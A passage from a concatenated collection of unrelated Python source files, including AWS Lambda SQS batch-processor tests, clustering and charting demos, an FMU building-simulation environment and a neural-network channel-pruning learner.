expected_type=URIType.PROJECT) fullname = fullname or (_uri.instance_type == InstanceType.CLOUD) _models, _pager = Model.list(_uri, page, size) BaseTermView._print_list(_models, show_removed, fullname) return _models, _pager @classmethod def build( cls, workdir: str, project: str, yaml_name: str = DefaultYAMLName.MODEL ) -> None: _model_uri = cls.prepare_build_bundle( workdir, project, yaml_name, URIType.MODEL ) _m = Model.get_model(_model_uri) _m.build(Path(workdir), yaml_name) @classmethod def copy(cls, src_uri: str, dest_uri: str, force: bool = False) -> None: Model.copy(src_uri, dest_uri, force) console.print(":clap: copy done.") @BaseTermView._header def tag(self, tags: str, remove: bool = False, quiet: bool = False) -> None: _tags = tags.split(",") if remove: console.print(f":golfer: remove tags [red]{tags}[/] @ {self.uri}...") self.model.remove_tags(_tags, quiet) else: console.print(f":surfer: add tags [red]{tags}[/] @ {self.uri}...") self.model.add_tags(_tags, quiet)
497592
from typing import Callable from unittest.mock import patch import pytest from botocore.config import Config from botocore.stub import Stubber from aws_lambda_powertools.utilities.batch import PartialSQSProcessor, batch_processor, sqs_batch_processor from aws_lambda_powertools.utilities.batch.exceptions import SQSBatchProcessingError @pytest.fixture(scope="module") def sqs_event_factory() -> Callable: def factory(body: str): return { "messageId": "059f36b4-87a3-44ab-83d2-661975830a7d", "receiptHandle": "AQEBwJnKyrHigUMZj6rYigCgxlaS3SLy0a", "body": body, "attributes": {}, "messageAttributes": {}, "md5OfBody": "e4e68fb7bd0e697a0ae8f1bb342846b3", "eventSource": "aws:sqs", "eventSourceARN": "arn:aws:sqs:us-east-2:123456789012:my-queue", "awsRegion": "us-east-1", } return factory @pytest.fixture(scope="module") def record_handler() -> Callable: def handler(record): body = record["body"] if "fail" in body: raise Exception("Failed to process record.") return body return handler @pytest.fixture(scope="module") def config() -> Config: return Config(region_name="us-east-1") @pytest.fixture(scope="function") def partial_processor(config) -> PartialSQSProcessor: return PartialSQSProcessor(config=config) @pytest.fixture(scope="function") def partial_processor_suppressed(config) -> PartialSQSProcessor: return PartialSQSProcessor(config=config, suppress_exception=True) @pytest.fixture(scope="function") def stubbed_partial_processor(config) -> PartialSQSProcessor: processor = PartialSQSProcessor(config=config) with Stubber(processor.client) as stubber: yield stubber, processor @pytest.fixture(scope="function") def stubbed_partial_processor_suppressed(config) -> PartialSQSProcessor: processor = PartialSQSProcessor(config=config, suppress_exception=True) with Stubber(processor.client) as stubber: yield stubber, processor def test_partial_sqs_processor_context_with_failure(sqs_event_factory, record_handler, partial_processor): """ Test processor with one failing record """ fail_record = sqs_event_factory("fail") success_record = sqs_event_factory("success") records = [fail_record, success_record] response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []} with Stubber(partial_processor.client) as stubber: stubber.add_response("delete_message_batch", response) with pytest.raises(SQSBatchProcessingError) as error: with partial_processor(records, record_handler) as ctx: ctx.process() assert len(error.value.child_exceptions) == 1 stubber.assert_no_pending_responses() def test_partial_sqs_processor_context_only_success(sqs_event_factory, record_handler, partial_processor): """ Test processor without failure """ first_record = sqs_event_factory("success") second_record = sqs_event_factory("success") records = [first_record, second_record] with partial_processor(records, record_handler) as ctx: result = ctx.process() assert result == [ ("success", first_record["body"], first_record), ("success", second_record["body"], second_record), ] def test_partial_sqs_processor_context_multiple_calls(sqs_event_factory, record_handler, partial_processor): """ Test processor without failure """ first_record = sqs_event_factory("success") second_record = sqs_event_factory("success") records = [first_record, second_record] with partial_processor(records, record_handler) as ctx: ctx.process() with partial_processor([first_record], record_handler) as ctx: ctx.process() assert partial_processor.success_messages == [first_record] def test_batch_processor_middleware_with_partial_sqs_processor(sqs_event_factory, record_handler, partial_processor): """ Test middleware's integration with PartialSQSProcessor """ @batch_processor(record_handler=record_handler, processor=partial_processor) def lambda_handler(event, context): return True fail_record = sqs_event_factory("fail") event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("fail"), sqs_event_factory("success")]} response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []} with Stubber(partial_processor.client) as stubber: stubber.add_response("delete_message_batch", response) with pytest.raises(SQSBatchProcessingError) as error: lambda_handler(event, {}) assert len(error.value.child_exceptions) == 2 stubber.assert_no_pending_responses() @patch("aws_lambda_powertools.utilities.batch.sqs.PartialSQSProcessor") def test_sqs_batch_processor_middleware( patched_sqs_processor, sqs_event_factory, record_handler, stubbed_partial_processor ): """ Test middleware's integration with PartialSQSProcessor """ @sqs_batch_processor(record_handler=record_handler) def lambda_handler(event, context): return True stubber, processor = stubbed_partial_processor patched_sqs_processor.return_value = processor fail_record = sqs_event_factory("fail") event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]} response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []} stubber.add_response("delete_message_batch", response) with pytest.raises(SQSBatchProcessingError) as error: lambda_handler(event, {}) assert len(error.value.child_exceptions) == 1 stubber.assert_no_pending_responses() def test_batch_processor_middleware_with_custom_processor(capsys, sqs_event_factory, record_handler, config): """ Test middlewares' integration with custom batch processor """ class CustomProcessor(PartialSQSProcessor): def failure_handler(self, record, exception): print("Oh no ! It's a failure.") return super().failure_handler(record, exception) processor = CustomProcessor(config=config) @batch_processor(record_handler=record_handler, processor=processor) def lambda_handler(event, context): return True fail_record = sqs_event_factory("fail") event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]} response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []} with Stubber(processor.client) as stubber: stubber.add_response("delete_message_batch", response) with pytest.raises(SQSBatchProcessingError) as error: lambda_handler(event, {}) stubber.assert_no_pending_responses() assert len(error.value.child_exceptions) == 1 assert capsys.readouterr().out == "Oh no ! It's a failure.\n" def test_batch_processor_middleware_suppressed_exceptions( sqs_event_factory, record_handler, partial_processor_suppressed ): """ Test middleware's integration with PartialSQSProcessor """ @batch_processor(record_handler=record_handler, processor=partial_processor_suppressed) def lambda_handler(event, context): return True fail_record = sqs_event_factory("fail") event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("fail"), sqs_event_factory("success")]} response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []} with Stubber(partial_processor_suppressed.client) as stubber: stubber.add_response("delete_message_batch", response) result = lambda_handler(event, {}) stubber.assert_no_pending_responses() assert result is True def test_partial_sqs_processor_suppressed_exceptions(sqs_event_factory, record_handler, partial_processor_suppressed): """ Test processor without failure """ first_record = sqs_event_factory("success") second_record = sqs_event_factory("fail") records = [first_record, second_record] fail_record = sqs_event_factory("fail") response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []} with Stubber(partial_processor_suppressed.client) as stubber: stubber.add_response("delete_message_batch", response) with partial_processor_suppressed(records, record_handler) as ctx: ctx.process() assert partial_processor_suppressed.success_messages == [first_record] @patch("aws_lambda_powertools.utilities.batch.sqs.PartialSQSProcessor") def test_sqs_batch_processor_middleware_suppressed_exception( patched_sqs_processor, sqs_event_factory, record_handler, stubbed_partial_processor_suppressed ): """ Test middleware's integration with PartialSQSProcessor """ @sqs_batch_processor(record_handler=record_handler) def lambda_handler(event, context): return True stubber, processor = stubbed_partial_processor_suppressed patched_sqs_processor.return_value = processor fail_record = sqs_event_factory("fail") event = {"Records": [sqs_event_factory("fail"), sqs_event_factory("success")]} response = {"Successful": [{"Id": fail_record["messageId"]}], "Failed": []} stubber.add_response("delete_message_batch", response) result = lambda_handler(event, {}) stubber.assert_no_pending_responses() assert result is True def test_partial_sqs_processor_context_only_failure(sqs_event_factory, record_handler, partial_processor): """ Test processor with only failures """ first_record = sqs_event_factory("fail") second_record = sqs_event_factory("fail") records = [first_record, second_record] with pytest.raises(SQSBatchProcessingError) as error: with partial_processor(records, record_handler) as ctx: ctx.process() assert len(error.value.child_exceptions) == 2
497604
from sklearn.cluster import MeanShift from sklearn.datasets.samples_generator import make_blobs import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D from matplotlib import style style.use('ggplot') # Create random data points whose centers are the following centers = [[20, 0, 0], [0, 20, 0], [0, 0, 20], [0, 0, 0]] X, _ = make_blobs(n_samples=200, centers=centers, cluster_std=2) # Fit the data into MeanShift classifier with search bandwidth = 10 clf = MeanShift(bandwidth=10) clf.fit(X) # Get the labels of each data point # and cluster centers of the number of clusters formed labels = clf.labels_ cluster_centers = clf.cluster_centers_ print(cluster_centers) n_clusters = len(cluster_centers) print('Number of clusters found:', n_clusters) # Plot the data points with their clusters and centers on a 3d graph colors = 10*['r', 'g', 'b', 'y', 'c'] fig = plt.figure() ax = fig.add_subplot(111, projection='3d') for i in range(len(X)): ax.scatter(X[i][0], X[i][1], X[i][2], c=colors[labels[i]], marker='o') ax.scatter(cluster_centers[:, 0], cluster_centers[:, 1], cluster_centers[:, 2], marker='x', s=150, linewidth=5, zorder=10, color='k') plt.show()
497615
n = int(input()) a = list(map(int, input().split())) b = list(map(int, input().split())) print('Yes' if sum(x * y for x, y in zip(a, b)) == 0 else 'No')
497620
from hippy.klass import def_class from hippy.builtin_klass import k_Exception k_LogicException = def_class('LogicException', [], extends=k_Exception) k_BadFunctionCallException = def_class('BadFunctionCallException', [], extends=k_LogicException) k_BadMethodCallException = def_class('BadMethodCallException', [], extends=k_BadFunctionCallException) k_InvalidArgumentException = def_class('InvalidArgumentException', [], extends=k_BadFunctionCallException) k_DomainException = def_class('DomainException', [], extends=k_LogicException) k_RuntimeException = def_class('RuntimeException', [], extends=k_Exception) k_UnexpectedValueException = def_class('UnexpectedValueException', [], extends=k_RuntimeException)
497624
from setuptools import setup from setuptools.extension import Extension import numpy as np import os import re from glob import glob from pathlib import Path with open(os.path.join(os.path.dirname(__file__), "econml", "_version.py")) as file: for line in file: m = re.fullmatch("__version__ = '([^']+)'\n", line) if m: version = m.group(1) pyx_files = glob("econml/**/*.pyx", recursive=True) c_files = glob("econml/**/*.c", recursive=True) # If both a .pyx and a .c file exist, we assume the .c file is up to date and don't force a recompile pyx_files = [file for file in pyx_files if (os.path.splitext(file)[0] + ".c") not in c_files] c_extensions = [Extension(os.path.splitext(file)[0].replace(os.sep, '.'), [file], include_dirs=[np.get_include()]) for file in c_files] if pyx_files: from Cython.Build import cythonize pyx_extensions = cythonize([Extension("*", pyx_files, include_dirs=[np.get_include()])], language_level="3") else: pyx_extensions = [] # configuration is all pulled from setup.cfg setup(ext_modules=c_extensions + pyx_extensions, zip_safe=False, version=version)
497671
from utils.db.mongo_orm import * class TestEnvParam(Model): class Meta: database = db collection = 'testEnvParam' # Fields _id = ObjectIdField() name = StringField(field_name='name') paramValue = StringField(field_name='paramValue') testEnvId = ObjectIdField() description = StringField() status = BooleanField(field_name='status', default=False) projectId = ObjectIdField() isDeleted = BooleanField(field_name='isDeleted', default=False) createAt = DateField() lastUpdateTime = DateField() createUser = StringField() lastUpdateUser = StringField() def __str__(self): return "key:{} - value:{} - testEnvId:{} - description:{} - projectId:{}" \ .format(self.key, self.value, self.testEnvId, self.description, self.projectId) if __name__ == '__main__': pass
497682
import pytest import aerosandbox.numpy as np import casadi as cas def test_norm_vector(): a = np.array([1, 2, 3]) cas_a = cas.DM(a) assert np.linalg.norm(a) == np.linalg.norm(cas_a) def test_norm_2D(): a = np.arange(9).reshape(3, 3) cas_a = cas.DM(a) assert np.linalg.norm(cas_a) == np.linalg.norm(a) assert np.all( np.linalg.norm(cas_a, axis=0) == np.linalg.norm(a, axis=0) ) assert np.all( np.linalg.norm(cas_a, axis=1) == np.linalg.norm(a, axis=1) ) if __name__ == '__main__': pytest.main()
497687
import tensorflow as tf from tensorflow.python.framework import ops _trace_norm = tf.load_op_library('trace_norm.so') @ops.RegisterGradient("TraceNorm") def _trace_norm_grad(op, grad, g_u, g_v): """The gradients for `trace_norm`. Args: op: The `trace_norm` `Operation` that we are differentiating, which we can use to find the inputs and outputs of the original op. grad: Gradient with respect to the output of the `trace_norm` op. Returns: Gradients with respect to the input of `trace_norm`. """ # TODO: Ensure that we are only using the gradient of the trace norm. # and not the `u' and `v' matrices. _, u, v = op.outputs trace_grad = tf.matmul(u, v, transpose_b=True) return [grad * trace_grad] def regularize(inputs, regularisation): return inputs + tf.ones_like(inputs) * regularisation def correlation_cost(source, target, source_regularisation=0, target_regularisation=0, use_target=True): num_source_samples = source.get_shape().as_list()[0] num_target_samples = target.get_shape().as_list()[0] # assert num_source_samples == num_target_samples num_samples = tf.to_float(tf.shape(target)[0]) source -= tf.reduce_mean(source, 0) target -= tf.reduce_mean(target, 0) correlation_matrix = tf.matmul(source, target, transpose_a=True) / (num_samples - 1) source_covariance = regularize(tf.matmul(source, source, transpose_a=True) / (num_samples-1), source_regularisation) # source_covariance = (tf.transpose(source_covariance) + source_covariance) / 2. root_source_covariance = tf.cholesky(source_covariance) inv_root_source_covariance = tf.matrix_inverse(root_source_covariance) canonical_correlation = tf.matmul(inv_root_source_covariance, correlation_matrix) if use_target: target_covariance = regularize(tf.matmul(target, target, transpose_a=True) / (num_samples-1), source_regularisation) root_target_covariance = tf.cholesky(target_covariance) inv_root_target_covariance = tf.matrix_inverse(root_target_covariance) canonical_correlation = tf.matmul(canonical_correlation, inv_root_target_covariance) loss, u, v = _trace_norm.trace_norm(canonical_correlation) return - loss
497746
import pyecharts.options as opts from pyecharts.charts import Line from pyecharts.faker import Faker c = ( Line() .add_xaxis(Faker.choose()) .add_yaxis("商家A", Faker.values(), areastyle_opts=opts.AreaStyleOpts(opacity=0.5)) .add_yaxis("商家B", Faker.values(), areastyle_opts=opts.AreaStyleOpts(opacity=0.5)) .set_global_opts(title_opts=opts.TitleOpts(title="Line-面积图")) .render("line_area_style.html") )
497765
import requests from requests.auth import HTTPBasicAuth from yelp_beans.data_providers.data_provider import DataProvider class RestfulJSONDataProvider(DataProvider): def __init__(self, url, username=None, password=<PASSWORD>, timeout=60.0): self.url = url self.username = username self.password = password self.timeout = timeout def _authentication(self): if self.username and self.password: return HTTPBasicAuth(self.username, self.password) def _fetch(self, data): result = requests.get( self.url, auth=self._authentication(), timeout=self.timeout, ) result.raise_for_status() return result.json()
497795
import unittest import logging import pytest from botoflow.core.async_event_loop import AsyncEventLoop from botoflow.core.async_task import AsyncTask from botoflow.core.decorators import task from botoflow.core.base_future import BaseFuture from botoflow.core.exceptions import CancellationError from botoflow.logging_filters import BotoflowFilter logging.basicConfig(level=logging.DEBUG, format='%(filename)s:%(lineno)d (%(funcName)s) - %(message)s') logging.getLogger('botoflow').addFilter(BotoflowFilter()) pytestmark = pytest.mark.usefixtures('core_debug') class TestTask(unittest.TestCase): def setUp(self): self.counter = 0 self.except_called = False self.finally_called = False @task def count(self): self.counter += 1 def test_task(self): ev = AsyncEventLoop() with ev: self.count() ev.execute_all_tasks() self.assertEqual(1, self.counter) def test_two_tasks(self): ev = AsyncEventLoop() with ev: self.count() self.count() ev.execute_all_tasks() self.assertEqual(2, self.counter) def test_recursive(self): ev = AsyncEventLoop() @task def recursive(ct=10): self.counter += 1 if ct == 1: return ct -=1 recursive(ct) with ev: recursive() ev.execute_all_tasks() self.assertEqual(10, self.counter) def test_exceptions(self): @task def task_func(): raise RuntimeError("Test") @task_func.do_except def except_func(err): self.except_called = True @task_func.do_finally def finally_func(): self.finally_called = True ev = AsyncEventLoop() with ev: task_func() ev.execute_all_tasks() self.assertTrue(self.except_called) self.assertTrue(self.finally_called) def test_task_finally(self): @task def recursive(ct=1): self.counter += 1 if ct == 1: return ct -=1 recursive(ct) @task def recursive_caller(): recursive() @recursive_caller.do_finally def finally_func(): self.finally_called = True ev = AsyncEventLoop() with ev: recursive_caller() ev.execute_all_tasks() self.assertTrue(self.finally_called) def test_tasks_finally(self): @task def recursive(ct=10): if ct == 1: return ct -=1 recursive(ct) @recursive.do_finally def recursive(): self.counter += 1 ev = AsyncEventLoop() with ev: recursive() ev.execute_all_tasks() self.assertEqual(10, self.counter) def test_finally_with_subtask(self): @task def count(): self.counter += 1 @count.do_finally def count(): self.counter += 1 @task def count(): self.counter +=1 @count.do_finally def count(): self.counter += 1 count() ev = AsyncEventLoop() with ev: count() ev.execute_all_tasks() self.assertEqual(4, self.counter) def test_finally_with_err_subtask(self): @task def count(): self.counter += 1 @count.do_finally def count(): self.counter += 1 @task def err(): raise RuntimeError("Test") @err.do_finally def err(): self.counter += 1 err() ev = AsyncEventLoop() with ev: count() ev.execute_all_tasks() self.assertEqual(3, self.counter) def test_except_with_err_subtask(self): @task def count(): self.counter += 1 @count.do_finally def count(): self.counter += 1 @task def err(): raise RuntimeError("Test") @err.do_except def err(err): if isinstance(err, RuntimeError): self.counter += 1 err() ev = AsyncEventLoop() with ev: count() ev.execute_all_tasks() self.assertEqual(3, self.counter) def test_finally_reraise_subtask(self): @task def count(): self.counter += 1 @count.do_finally def count(): self.counter += 1 @task def err(): raise RuntimeError("Test") @err.do_except def err(err): if isinstance(err, RuntimeError): self.counter += 1 raise err err() ev = AsyncEventLoop() with ev: count() ev.execute_all_tasks() self.assertEqual(3, self.counter) def test_finally_reraise_catch_subtask(self): @task def count(): self.counter += 1 @count.do_finally def count(): self.counter += 1 @task def err(): raise RuntimeError("Test") @err.do_except def err(err): if isinstance(err, RuntimeError): self.counter += 1 raise err err() @task def main(): self.counter +=1 count() @main.do_except def main(err): self.counter += 1 ev = AsyncEventLoop() with ev: main() ev.execute_all_tasks() self.assertEqual(5, self.counter) def test_finally_reraise_catch_finally_subtask(self): @task def count(): self.counter += 1 @count.do_finally def count(): self.counter += 1 @task def err(): raise RuntimeError("Test") @err.do_except def err(err): if isinstance(err, RuntimeError): self.counter += 1 raise err err() @task def main(): self.counter +=1 count() @main.do_except def main(err): self.counter += 1 @main.do_finally def main(): self.counter += 1 ev = AsyncEventLoop() with ev: main() ev.execute_all_tasks() self.assertEqual(6, self.counter) def test_except_and_finally_raise(self): @task def raises(): raise RuntimeError("Error") @raises.do_except def raises(err): raise err @raises.do_finally def raises(): raise ValueError("Finally wins") @task def main(): raises() @main.do_except def main(err): if isinstance(err, ValueError): self.except_called = True elif isinstance(err, RuntimeError): self.except_called = False ev = AsyncEventLoop() with ev: main() ev.execute_all_tasks() self.assertTrue(self.except_called) def test_cancel_before_except(self): @task def raises(): raise RuntimeError("Error") @task def main(): raises() self.count() self.count() @main.do_except def main(err): self.counter += 1 ev = AsyncEventLoop() with ev: main() ev.execute_all_tasks() self.assertEqual(1, self.counter) def test_cancel_except_finally(self): @task def raises(): raise RuntimeError("Error") @task def other(): self.counter -= 1 @other.do_except def other(err): if isinstance(err, CancellationError): self.counter += 1 @other.do_finally def other(): self.counter += 1 @task def main(): raises() other() @main.do_except def main(err): self.counter += 1 ev = AsyncEventLoop() with ev: main() ev.execute_all_tasks() self.assertEqual(3, self.counter) def test_future(self): future = BaseFuture() @task def other(): future.set_result(1) @task def main(): other() ev = AsyncEventLoop() with ev: main() ev.execute_all_tasks() self.assertEqual(1, future.result()) def test_future_with_task(self): future = BaseFuture() def count(): self.counter +=1 @task def other(): future.set_result(1) @task def main(): other() ev = AsyncEventLoop() with ev: future.add_task(AsyncTask(count)) main() ev.execute_all_tasks() self.assertEqual(1, future.result()) self.assertEqual(1, self.counter) if __name__ == '__main__': unittest.main()
497837
import csv from django.core.management.base import BaseCommand from api.models import Country, District from django.db import transaction from django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned class Command(BaseCommand): help = 'Maps some orphan districts to countries. join_districts_to_country.csv is required (Johnny)' missing_args_message = "Filename is missing. A valid CSV file is required." def add_arguments(self, parser): parser.add_argument('filename', nargs='+', type=str) @transaction.atomic def handle(self, *args, **options): filename = options['filename'][0] rows = csv.DictReader(open(filename, 'r'), fieldnames=['District code', 'Country ISO']) next(rows) for row in rows: dcode = row['District code'] iso = row['Country ISO'] try: country = Country.objects.get(iso=iso, record_type=1) district = District.objects.get(code=dcode) district.country = country district.country_name = country.name district.country_iso = country.iso district.save() except ObjectDoesNotExist: print(f'Missing Country ({iso}) or District ({dcode})') except MultipleObjectsReturned: print(f'More than one Country with ({iso}) or District with ({dcode})') print('Done!')
497855
import logging import os from energym.envs.env_fmu import EnvFMU from energym.envs.utils.weather import MOS from energym.envs.weather_names import WEATHERNAMES import energym logger = logging.getLogger(__name__) class EnvModFMU(EnvFMU): """Base class for Modelica based FMU simulation models. Subclasses EnvFMU and inherits its behavior. Defines Modelica specific simulation details. Methods -------- set_model_variables(variables, values) Sets value of model variables (Modelica). get_variable_data(list_vars) Retrieves data for a list of variables. """ def __init__( self, model_path, start_time, stop_time, step_size, weather, params, init_vals, input_specs, output_specs, kpi_options, default_path=True, generate_forecasts=True, generate_forecast_method="perfect", generate_forecast_keys=None, ): """ Parameters ---------- model_path : str Specifies the path to the FMU start_time : int Begin of the simulation time in seconds in relation to the beginning of the year stop_time : int End of the simulation time in seconds in relation to the beginning of the year step_size : float Length of a simulation timestep in seconds weather : str Specifies the used weather file input_specs : dict Contains the inputs of the model output_specs : dict Contains the outputs of the model kpi_options : dict Dict to specify the tracked KPIs. default_path : bool, optional Whether to use the default path or an absolute path in model_path and weather Raises ------ Exception If the passed weather file is not contained in the list of available weather files """ self.params = params if default_path: path = os.path.abspath(energym.__file__) path = os.path.abspath(os.path.join(path, "..", "..")) fmu_file = os.path.join( path, "simulation", "modelica", model_path + ".fmu", ) else: fmu_file = model_path if weather is None: super().__init__( fmu_file, start_time, stop_time, step_size, weather, input_specs, output_specs, kpi_options, default_path, ) self.look_for_weather_file() else: weather_mos = MOS() if default_path: if weather in WEATHERNAMES: weather_file = os.path.join( path, "simulation", "modelica", model_path.split(os.sep)[0], "wf", WEATHERNAMES[weather] + ".mos", ) weather_mos.read( weather_file, generate_forecasts, generate_forecast_method, generate_forecast_keys, ) else: raise Exception("Unknown weather file") else: weather_file = weather weather_mos.read( weather, generate_forecasts, generate_forecast_method, generate_forecast_keys, ) super().__init__( fmu_file, start_time, stop_time, step_size, weather_mos, input_specs, output_specs, kpi_options, default_path, weather_file, ) self.init_vals = {key: init_vals[key] for key in self.input_keys} print("the initial variables are", self.init_vals) self.set_model_variables(list(params.keys()), list(params.values())) self.set_model_variables( list(self.init_vals.keys()), list(self.init_vals.values()) ) def set_model_variables(self, variables, values): """Sets value of model variables. Parameters ---------- variables: str or list list of variables to set values: str or list list of values to set """ if self.is_fmu_initialized: logger.warning( "FMU is already initialized. Values set may not be propagated in model as expected." ) if isinstance(variables, str): self.set_model_variables([variables], [values]) elif isinstance(variables, list): self.fmu.setReal([self.vrs[v] for v in variables], values) else: TypeError("variables should be list of str") def get_variable_data(self, list_vars): """Retrieves data for a list of variables. Parameters ---------- list_vars : list List of variables to retrieve. Variables can be outputs of the model or internal variables. Returns ------- dict Dictionary with values for the variables. """ # get the values out_values = self.fmu.getReal([self.vrs[key] for key in list_vars]) res = [(self.time, out_values)] return self.post_process(list_vars, res) def get_output(self): out = self.fmu.getReal([self.vrs[key] for key in self.output_keys]) res = [(self.time, out)] output = self.post_process(self.output_keys, res, arrays=False) return output def reset(self): super().reset() self.set_model_variables(list(self.params.keys()), list(self.params.values())) self.set_model_variables( list(self.init_vals.keys()), list(self.init_vals.values()) )
497856
import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim # from tensorboardX import SummaryWriter import os import logging from utils.utils import * from utils.compute_flops import lookup_table_flops from utils.transfer_archs import decode_cfg import torch.distributed as dist from utils.dist_utils import * import time import pickle from pdb import set_trace as br class Architect(nn.Module): def __init__(self, model, args): super(Architect, self).__init__() self.args = args self.model = model # flops table loaded inside the learner self.optimizer = torch.optim.Adam(list(self.model.arch_parameters()), lr=args.arch_learning_rate, betas=(0.5, 0.999), weight_decay=args.arch_weight_decay) self.baseline = torch.tensor(0.).cuda() self.gamma = args.gamma def update_baseline(self, reward_raw): self.baseline = self.baseline * self.gamma + reward_raw * (1-self.gamma) def step(self, archs_logP, reduced_acc1, archs_entropy, arch_tmp): # NOTE: only update rl agent on rank 0 policy_loss, reward_raw = self.model._loss_arch(archs_logP, reduced_acc1, archs_entropy, arch_tmp, self.baseline) if self.args.rank == 0: self.optimizer.zero_grad() policy_loss.backward() self.optimizer.step() self.update_baseline(reward_raw) if self.args.distributed: # sync baseline and arch master dist.barrier() dist.broadcast(self.baseline, 0) broadcast_params(self.model.arch_master) # check passed. params are the same on multiple GPU return reward_raw class ChannIlsvrcLearner(object): def __init__(self, model, loaders, args, device): self.args = args self.device = device self.model = model self.proj_lr = 0. # initially do not change P,Q self.__build_path() self.train_loader, self.test_loader = loaders # self.writer = SummaryWriter(os.path.dirname(self.save_path)) self.__build_learner() def __build_learner(self): # split variables to weights and arch_params self.__setup_optim() self.architect = Architect(self.model, self.args) self.criterion = nn.CrossEntropyLoss().cuda() def train(self, samplers): train_sampler = samplers self.model.arch_master.force_uniform = True # initially random sample for warmup for epoch in range(self.args.epochs): if self.args.distributed: assert train_sampler is not None train_sampler.set_epoch(epoch) if epoch > self.args.warmup_epochs: self.model.arch_master.force_uniform = False if self.args.ft_schedual == 'follow_meta': self.proj_opt.param_groups[0]['lr'] = self.proj_opt.param_groups[0]['lr'] # 0.001 elif self.args.ft_schedual == 'fixed': self.proj_opt.param_groups[0]['lr'] = self.args.ft_proj_lr else: raise ValueError('Wrong Projection Fintuning Type!.') self.model.train() if self.check_is_primary(): logging.info("Training at Epoch: %d" % epoch) train_acc, train_loss = self.epoch_train(epoch) if self.lr_scheduler: self.lr_scheduler.step() # in ilsvrc learner we warmup in advance. and (epoch > self.args.warmup_epochs): if (epoch + 1) % self.args.eval_epoch == 0: if self.check_is_primary(): self.save_model() logging.info("Evaluation at Epoch: %d" % epoch) if (epoch + 1) == self.args.epochs//2 and self.args.warmup_epochs == self.args.epochs: # NOTE: store a 0.1 lr model separately self.save_model('model_0.1.pt') logging.info("Init lr model saved") if self.args.distributed: dist.barrier() self.evaluate(True, epoch) def finetune(self, samplers): train_sampler = samplers self.load_model() self.evaluate(True, 0) for epoch in range(self.args.epochs): if self.args.distributed: assert train_sampler is not None train_sampler.set_epoch(epoch) if epoch > self.args.warmup_epochs: self.model.arch_master.force_uniform = False if self.args.ft_schedual == 'follow_meta': self.proj_opt.param_groups[0]['lr'] = self.proj_opt.param_groups[0]['lr'] # 0.001 elif self.args.ft_schedual == 'fixed': self.proj_opt.param_groups[0]['lr'] = self.args.ft_proj_lr else: raise ValueError('Wrong Projection Fintuning Type!.') self.model.train() if self.check_is_primary(): logging.info("Finetuning at Epoch: %d" % epoch) ft_acc, ft_loss = self.epoch_train(epoch) if self.lr_scheduler: self.lr_scheduler.step() if (epoch + 1) % self.args.eval_epoch == 0: if self.check_is_primary(): self.save_model() logging.info("Evaluation at Epoch: %d" % epoch) if self.args.distributed: dist.barrier() self.evaluate(True, epoch) def evaluate(self, is_train=False, epoch=None): self.model.eval() if self.args.distributed: sync_bn_stat(self.model, self.args.world_size) if not is_train: self.load_model() with torch.no_grad(): if self.args.beam_search: self.beam_search_eval() # self.epoch_eval(epoch) else: self.epoch_eval(epoch) def misc(self): # check ilsvrc data total_idx = len(self.train_loader) for idx, (data_train, data_valid) in enumerate(zip(self.train_loader, self.valid_loader)): input_x, target_y = data_train[0].to(self.device), data_train[1].to(self.device) input_search, target_search = data_valid[0].to(self.device), data_valid[1].to(self.device) if idx % 100 == 0: print("Reading... %.2f complete" % float(idx/total_idx)) print("All input passed") def epoch_train(self, epoch): """ Rewrite this function if necessary in the sub-classes. """ # setup statistics batch_time = AverageMeter('Time', ':3.3f') # data_time = AverageMeter('Data', ':6.3f') lr = AverageMeter('Lr', ':.3e') losses = AverageMeter('Loss', ':.4e') losses_ce = AverageMeter('Loss_ce', ':.4e') losses_proj = AverageMeter('Loss_proj', ':.4e') # penalty = AverageMeter('Penalty', ':.4e') # flops = AverageMeter('Decode FLOPs', ':.4e') rewards = AverageMeter('Controller reward', ':.4e') entropy = AverageMeter('Entropy', ':.4e') top1 = AverageMeter('Acc@1', ':3.3f') top5 = AverageMeter('Acc@5', ':3.3f') metrics = [lr, batch_time, top1, top5, losses, losses_ce, losses_proj, rewards, entropy] loader_len = len(self.train_loader) progress = ProgressMeter(loader_len, *metrics, prefix='Job id: %s, ' % self.args.job_id) end = time.time() for idx, data_train in enumerate(self.train_loader): input_x, target_y = data_train[0].to(self.device), data_train[1].to(self.device) logits, archs_logP, archs_entropy, arch_tmp = self.model(input_x) # check passed: archs are all the same across multiple GPUS. # NOTE: archs_entropy and logP may be different, but we only update # arch_master on rank==0. loss_ce = self.criterion(logits, target_y) / self.args.world_size acc1, acc5 = accuracy(logits, target_y, topk=(1, 5)) reduced_loss_ce = loss_ce.data.clone() reduced_acc1 = acc1.clone() / self.args.world_size reduced_acc5 = acc5.clone() / self.args.world_size if self.args.distributed: dist.all_reduce(reduced_loss_ce) dist.all_reduce(reduced_acc1) dist.all_reduce(reduced_acc5) # NOTE: policy_loss and loss_ce, loss_proj are w.r.t different graphs. # Therefore freeing graph for policy_loss does not affect loss_ce # and loss_proj` # update alpha on validation set after warmup if epoch > self.args.warmup_epochs: reward_raw = self.architect.step(archs_logP, reduced_acc1, archs_entropy, arch_tmp) rewards.update(reward_raw.item(), n=1) entropy.update(archs_entropy.item(), n=1) # update meta and projection weights self.opt.zero_grad() loss_ce.backward() if self.args.distributed: average_group_gradients(self.model.meta_parameters()) self.opt.step() if idx % self.args.updt_proj == 0: # NOTE: now we update orthogonal loss seperately inside loss_proj = self.model.updt_orthogonal_reg_loss(self.proj_opt) # return a python scalar # project back to unit lenght after warmup if self.args.norm_constraint == 'constraint' and self.proj_opt.param_groups[0]['lr'] > 0: for k, v in self.model.named_projection_parameters(): v_sum = v.transpose(1, 0).mm(v).sqrt().diag() v_sum = v_sum.repeat(v.size(0), 1) v.data = (v / v_sum).data elif self.args.norm_constraint != 'constraint': raise ValueError # update statistics top1.update(reduced_acc1[0].item(), input_x.shape[0]) top5.update(reduced_acc5[0].item(), input_x.shape[0]) 